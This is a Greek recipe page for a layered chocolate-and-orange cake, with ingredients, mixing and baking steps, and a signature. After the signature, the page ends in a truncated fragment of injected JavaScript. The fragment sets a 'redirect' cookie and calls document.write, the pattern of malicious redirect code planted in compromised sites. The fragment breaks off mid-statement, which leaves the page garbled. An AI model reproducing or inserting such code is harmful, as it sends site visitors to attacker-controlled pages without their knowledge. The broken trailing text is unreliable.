Κέικ με σοκολάτα και πορτοκάλι
Σήμερα οι τσούχτρες έφτιαξαν κέικ και σας το προτείνουν. Είναι εύκολο στην παρασκευή του και γευστικότατο!!!
Υλικά
- 1 πακέτο φαρινάπ Γιώτης
- 1 βούτυρο βιτάμ ή super fresco ελαίς (250 γρ)
- 1.5 φλυτζάνι τσαγιού ζάχαρη
- 4 αβγά
- 1 φλυτζάνι τσαγιού γάλα
- 1/2 φλυτζάνι τσαγιού στιμένο πορτοκάλι
- ξύσμα πορτοκαλιού
- 2 κουταλιές της σούπας γεμάτες κακάο
- 1 πακέτο νιφάδες μαύρης σοκολάτας
Παρασκευή
1. Χτυπάμε στο μίξερ το βούτυρο με τη ζάχαρη.
2. Ρίχνουμε ένα-ένα τα αυγά χτυπώντας καλά.
3. Έπειτα ρίχνουμε τον χυμό πορτοκαλιού, το ξύσμα πορτοκαλιού, το γάλα και στο τέλος το αλεύρι συνεχίζοντας το χτύπημα μέχρι να ομογενοποιηθεί το μείγμα.
4. Αδειάζουμε λίγο από το περιεχόμενο του μείγματος σε ένα άλλο μπολ και προσθέτουμε το κακάο. Χτυπάμε με το μίξερ.
5. Αδειάζουμε το μείγμα σε μία μεγάλη φόρμα cake καλά βουτυρωμένη. Πρώτα το λευκό μείγμα, συνεχίζουμε με το σοκολατένιο μείγμα και τέλος από πάνω το υπόλοιπο λευκό μείγμα.
6. Ρίχνουμε ομοιόμορφα τις νιφάδες μαύρες σοκολάτας και με ένα πιρούνι χαράζουμε σε διάφορα σημεία του μείγματος ώστε να πάρει εσωτερικά το σχέδιο που επιθυμούμε το κέικ και να γίνει ένα πρώτο ανακάτεμα με τις νιφάδες σοκολάτας.
6. Ψήνουμε σε προθερμασμένο φούρνο στους 180°C για 70′ περίπου. Όταν ψηθεί το αφήνουμε για 10 λεπτά να σταθεί και ξεφορμάρουμε.
Τιπ: Οι νιφάδες σοκολάτας πέφτουν από μόνες τους κατά τη διάρκεια του ψησίματος μέσα στο κέικ. Μην τις πειράξετε πολύ.
Καλή σας όρεξη!
-Ρούλα Μος-
ate.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘